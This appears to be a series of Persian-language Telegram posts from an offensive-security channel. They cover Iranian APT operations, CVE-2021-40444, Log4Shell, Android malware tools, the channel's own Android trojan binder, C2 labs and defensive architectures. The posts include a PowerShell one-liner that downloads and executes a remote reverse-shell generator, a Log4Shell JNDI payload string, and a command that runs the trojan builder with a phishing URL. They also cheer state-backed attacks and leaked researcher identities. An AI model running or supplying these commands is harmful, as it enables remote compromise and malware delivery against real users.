#ClearSky Cyber Security Researchers
چند ماهی است شاهد درگیری های سایبری بین ایران و کشور جعلی اسرائیل هستیم که خب تیم های تهاجمی ایرانی کنش های مناسبی رو نشون دادند،

از این روی شرکت معروف ClearSky که یک شرکت وابسته به دستگاه های جاسوسی کشور جعلی اسرائیل است، از این حملات بی نصیب نمانده و هویت محققین و برخی تحقیقات این شرکت هم لو رفته است،

این سطح از حملات حاکی از این داره که تیم های تهاجمی ایران در بحث عملیات های APT از تکنیک های سطح پیشرفته ای در بحث Initial Access استفاده میکنند، از طرفی هنوز گزارش های جرم شناسی دقیقی از این حملات منتشر نشده که این هم نشان دهنده قدرت فنی ایران در بحث Defense Evasion داره

امیدواریم مباحث اجتماعی و زیرساختی حوزه سایبری هم در کشور بقدر دستگاه های نظارتی بهش بها داده بشه و از پتانسیل های مردمی برای بُعد تحقیقات تهاجمی و دفاعی استفاده کافی و وافی صورت بگیره...

@Unk9vvN
#Age Apocalypse Kali

دوران عصر آخر (Kali)...



https://en.wikipedia.org/wiki/Kali_(demon)
@Unk9vvN
#Reverse Engineering #Android #Tools
در بحث تحلیل بد افزار های Android یکی از عواملی که همواره میتونه در این بحث کمک کننده باشه، استفاده از ابزارهای مناسب خواهد بود،

ابزار Dexcalibur که برای Unpacking و ساده سازی مبهم سازی ها و ایجاد Hook استفاده میشود.

Dexcalibur -> Unpacking - De-obfuscate - Specific Hook

ابزار Hourse که برای شناسایی ارتباطات و فایل ها و اشتراکات در شبکه میتواند استفاده شود و همچنین ساده سازی مبهم بازی های مورد استفاده بد افزارها.

House -> Network Monitoring - De-obfuscate - Specific Hook

مورد بعدی MobSF هستش که در امر شناسایی توابع General API Monitoring هستش و دور زدن مکانیزم های تشخیص Debug .و root بودن خواهد بود.

MobSF -> General API Monitoring - Bypass Debugger / rooting detection - Static analysis

و مورد آخر ابزار Quark هستش که بصورت اختصاصی میتونه Static analysis برای ما انجام بده.

Quark -> Static analysis


@Unk9vvN
#Exploit Public-Facing Application
به لطف تحقیقات عمومی شده محقق معروف یعنی Orange Tsai کشور ما در عرصه حملات سایبری توانسته خودنمایی خوبی از خود نشان بدهد

موضوعی که دلیل وجودی کنفرانس ها و حمایت های تحقیقاتی که در همه جای دنیا شرکت های خصوصی و دستگاه های حاکمیتی در بحث علوم امنیت سایبر انجام میدهند، منظور دقیق تر این است که زمانی که شما پتانسیل تحقیقاتی کشور رو فعال نکنید همواره نیروی انسانی رو راهی کشور های خارجی کرده و یک قدم حتی در حوزه حملات سایبری از دنیا عقب خواهید بود

اما در خصوص حملات اخیر ایران: گفته شده از ابزار SharpWMI که مبتنی بر زبان #C و با استفاده از Functionality های WMI کار میکند مورد استفاده بوده و در بحث ایجاد Persistence از تکنیک T1053.005 که مبتنی بر XML است بهره گرفته شده

از دیگر موارد میتوان به اهداف حمله در پلن Impact اشاره کرد که رویکرد ایران نصب باج افزاری با نام BlackMatter بوده که قرار به رمز کردن فایل های حساس رو داشته

مورد بعد استفاده از پروتکل FTP بصورت Over Alternative Protocol بر روی درگاه 443 بوده که سعی بر شناسایی نشدن بوده.

https://t.me/Unk9vvN/1997
@Unk9vvN
#Powershortshell Stealer for #Iranian
در روزهای گذشته یک حمله به برخی ارگان های داخل کشور اتفاق افتاده مبتنی بر آسیب پذیری CVE-2021-40444 که یک آسیب پذیری از نوع فایل فرمت Word هستش و از قرار معلوم موفق هم بوده

مهاجمین طبق معمول با استفاده از Spear Phishing Mail شروع به پخش ایمیل جعلی کردند که یک فایل word بهش Attachment شده بود، و جالبه که با استفاده از Internal Recon سیستم عامل قربانی ها مامور بر گرفتن دسترسی از مخاطبان فارسی زبان گرفته، یعنی فقط ایرانی ها هدف قرار گرفتند

محتوای ایمیل مشخصه که محتوای تحریکات سیاسی داره، اما در مورد ابعاد فنی میبایست گفت که مراحل Initial مربوط به Exploit به این صورت بوده که اول یک document ساخته میشه یک Bitmap Image اضافه میشه بعد doc بسته شده و Unzip میشه و فایل document.xml.rels بهش یک دامنه و فایل External معرفی میشه

در ادامه فایل document.xml باید به OLEObject اضافه شده که مبتنی بر اون COM Object مربوط به DLL ها یعنی rundll32.exe فراخوان خواهد شد و جالبه که از cpl برای اجرای فرمت inf استفاده شده که یک جبر مربوط به خود آسیب پذیری بوده.

@Unk9vvN
#Log4Shell #Zero_Day Exploit #Log4j Java Library
به تازگی آسیب پذیری کشف شده از نوع روز صفر که میتونه به مهاجم قدرت اجرای کد از راه دور رو بده، این آسیب پذیری با شناسه CVE-2021-44228 برای کتابخانه Apache log4j هستش که بسیاری از سرویس های ابری مانند Apple iCloud و Steam پیدا شده و میتوانسته مورد بهره برداری قرار بگیره، از نسخه 2.0 تا 2.14.1 این آسیب پذیری وجود داره و در نسخه 2.15.0 رفع شده.

https://t.me/Unk9vvN/1309

اما این آسیب پذیری مبتنی بر پروتکل HTTP و TCP میتونه به endpoint آسیب پذیر ارسال بشه و بهره برداری صورت بگیره، این آسیب پذیری در کتابخانه ای رخ داده که مامور Log مقادیر User Agent است و مهاجم میتونه پیلود خودش رو مبتنی بر پارامتر User Agent ارسال کرده و با wrapper پروتکل jndi دسترسی به ldap گرفته و ارتباطی رو مبتنی بر درگاهی ایجاد کنه.

Payload Example:

${jndi:ldap://127.0.0.1:1389/a}



https://github.com/tangxiaofeng7/apache-log4j-poc
https://issues.apache.org/jira/browse/LOG4J2-2109
@Unk9vvN
#Android Trojan Binder
اولین پروژه عمومی تیم تحقیقاتی Unk9 در سال 1397 آغاز شد که متمرکز بر حملات به سیستم عامل اندروید بود و در کنار استفاده از روش های مبهم سازی در خصوص Bind پیلود Metasploit عمل میکرد و از تکنیک های دیگری مانند Certificate Spoofing هم بهره میبرد.

از دیگر ویژگی های آن ابزار این بود که مکانیزم Request Permission سیستم عامل اندروید رو که از نسخه API 21 که در اندروید 6 به بعد استفاده شد رو دور میزد، از موارد دیگه میشه به پایدار نگهداشتن پل ارتباطی خط فرمان بود که مکانیزم SELinux قالبا اقدام به بستن دسترسی TCP میکرد، داشت

از موارد دیگه میشه به استفاده از دو روش Hook اشاره کرد که Activity پیلود مربوطه رو به دو طریق فعال میکرد و باعث برقراری ارتباط میشد، بحث ساخت PostEXP بصورت اتوماتیک بود که وقتی دسترسی برقرار میشد، فعال شده و جمع آوری اطلاعات رو انجام میداد، همچنین بحث Persistence هم پوشش داده شده بود.

موارد مربوط به مهندسی اجتماعی حذف شده است.

┌──(unk9vvn㉿avi)-[~]
└─$ sudo chmod +x AndTroj.sh;sudo ./AndTroj.sh $NoIP $Original-APK $Phishing-URL


https://github.com/a9v8i/andtroj
@Unk9vvN
#C2_Matrix Labs
آزمایشگاهی در خصوص شبیه سازی ابزارهای Command and Control یا C2 ساخته شده که میتونه به ما کمک شایانی در خصوص شناخت پتانسیل خط فرمان های مختلف بده و همچنین نحوه کار کرد این خط فرمان ها.

تقریبا میتوان گفت تمامی خط فرمان های معروف متن باز در دنیا پوشش داده شده و این میتونه ما رو در خصوص فهم چگونگی برقرار ارتباط آنها با بدافزار یا جاوسوس افزار های خود را چطور انجام میدهند.

همچنین طریقه کشف و شکار این ارتباطات میتونه انجام بشه و از ابزار هایی مانند Wireshark و Sysmon استفاده میشود، این آزمایشگاه میتونه به شکارچیان تهدید و جرم شناسان کمک شایانی بکنه.

https://howto.thec2matrix.com
@Unk9vvN
This media is not supported in your browser
VIEW IN TELEGRAM
#Powershell HTTP/S Reverse Shell
یه ابزار بسیار خوب در بحث ساخت RAT های مختلف مبتنی بر فایل فرمت های رایج که در تصویر مشخصه.

این ابزار در خصوص شبیه سازی عملیات تیم قرمز میتونه یک گزینه خوبی باشه که در مقابل مکانیم های IDS و IPS و AV تونسته ناشناس یا Evasion باشه، برای ساخت پیلود میتونید از فرمان زیر بصورت مستقیم استفاده کنید...

powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"


https://github.com/3v4Si0N/HTTP-revshell
@Unk9vvN
#Cybersecurity #Reference #Architecture
مایکروسافت در ورکشاپ CISO یا مدیر امنیت اطلاعات سعی داشته که در پنج مرحله تمامی ساختار های امنیت سایبری را در خصوص یک سازمان یا شرکت تجاری تشریح کند،

از این روی مباحثی مانند SOC و و SIEM و SOAR را مبتنی بر Graph Security API برقراره کرده و تمامی Infrastructure خودش رو مبتنی بر Azure Security Center بقرار میکند،

در تمامی ابعاد مکانیزم های امنیتی قرار دارند و مبتنی بر دستگاه مربوطه خود مامور رهگیری های امنیتی هستند، مثلا در قسمت Extranet مواردی مانند Edge DLP و SSL Proxy و IPS/IDS و NGFW توانسطه عملیات شناسایی تهدید رو در لبه شبکه قرار کنه،

از موارد دیگه استفاده از Microsoft Defender ATP هستش که مامور پایش Endpoint Security بوده و از محصولاتی Office 365 سعی بر برقرار امنیت داره، مواردی مانند Azure WAF و DDoS Mitigation هم مکمل های لایه Application هستش که توانسته اند پازل امنیتی رو کامل کنند،

خلاصه که یک آرایش کاملی از برقراری امنیت ارائه شده که بد نیست مبنای خدمات دفاعی در کشور بشه، البته مبتنی بر محصولات بومی یا Trust خارجی...

https://aka.ms/MCRA
@Unk9vvN
#Obfuscation (#RAR with #JPG ext) #RedTeam
یکی از روش هایی که همواره در عملیات های تیم قرمز در سالهای آتی مورد توجه بود تکنیک استفاده از Extension Spoofing بواسطه کاراکتر Letf-to-Right و همچنین استفاده از فایل فرمت SFX که مبتنی بر نرم افزار WinRAR به نوعی عملیات Section Compression رو در فایل فرمت خودش انجام میداد و به روش Stub Decompression مقادیر کمپر شده خودش رو آزاد میکرد، و در کنار این آزاد کردن مواردی رو هم خودش اجرا میکرد مانند: run as administrator یا Extract کردن داده های کمپرس شده در آدرس مشخص شده و همچنین اجرای اون فایل ها...

اما در سال 2018 که تیم تحقیقاتی Unk9vvN دمویی از این تکنیک رو نمایی کرد، همزمان با این رو نمایی یک APT 39 منتسب به ایران هم رخ داد که از همین تکنیک فوق استفاده شده بود، همچنین این تکنیک همونطور که در تصویر دوم مشاهده میشه آن زمان پتانسیل دور زدن EDR و NIDS و AV ها رو داشته و کاملا عملیاتی بوده، البته امروز دیگر این تکنیک لو رفته و کار آمد نیست، برای مشاهده بخشی از این تکنیک میتونید به دمو تولید شده در سال 2019 مراجعه نمایید...

@Unk9vvN
#DTS #Solution
در تصاویر پست راهکارهای امنیتی یکی از شرکت های خارجی رو مشاهده میکنید که در پنج مرحله آرایش راهکار امنیتی خودش رو تشریح کرده،

اولین مورد Cyber Strategy هستش که مشخص میشه مبتنی بر نیازمندی های یک سازمان و مجموعه چه نوعی از استراتژی رو میبایست شرکت امنیتی در نظر بگیره، معمولا در این مورد متغیر های زیادی وجود نداره.

دومین مورد Cyber Secure هستش که اشاره میشه به سه دسته Red Team که خدمات تهاجمی رو پیاده سازی میکند، دوم Blue Team که خدمات تدافعی رو پشتیبانی خواهد کرد و سوم White Team که نقش مشاوره ای دارد، در تصویر مشخصه که هر کدام چه نقش ها و موضوعاتی رو شامل میشن و این حلقه با هم یک ساختار ایمن رو برقرار خواهند کرد،

اما در مرحله Defense in Depth میبینیم که 8 بخش مطرحه که در لایه ها و Scope های مختلف محصولات و سرویس های دفاعی و خدمات، طرح ریزی شده و در کنار هم زنجره امنیت دفاعی رو پوشش خواهند داد، بدلیل محدودیت نوشتاری در پست های تلگرام از توضیح تک به تک صرف نظر میکنم،

اما در مورد قسمت Cyber Kill Chain آرایش دفاعی در مقابل APT رو هم تشریح کرده است.

https://www.dts-solution.com/
@Unk9vvN